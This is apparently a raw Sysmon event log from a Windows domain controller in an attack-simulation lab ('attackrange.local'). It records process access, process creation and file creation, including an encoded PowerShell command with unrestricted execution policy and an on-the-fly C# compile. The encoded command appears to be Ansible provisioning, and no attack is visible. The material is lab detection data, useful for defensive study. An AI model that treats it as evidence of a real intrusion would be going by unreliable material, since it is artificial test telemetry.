.dll+51791 10341000x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-857A-5FCF-9400-000000009101}44764480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-857A-5FCF-9500-000000009101}2228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003158Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003157Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003156Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003155Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.659{10ACEC4A-857A-5FCF-9500-000000009101}2228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESFF8D.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC22E81BEDC7254D2196FE505EB433FAEE.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-857A-5FCF-9400-000000009101}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\kccz3rzq.cmdline" 10341000x80000000000000003153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-857A-5FCF-9400-000000009101}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-857A-5FCF-9400-000000009101}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8579-5FCF-9200-000000009101}43364444C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857A-5FCF-9400-000000009101}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81926BBEF) 10341000x80000000000000003143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.309{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.272{10ACEC4A-857A-5FCF-9400-000000009101}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\kccz3rzq.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.247{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\kccz3rzq.cmdline2020-12-08 13:54:02.247 11241100x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:02.247{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\kccz3rzq.dll2020-12-08 13:54:02.247 10341000x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 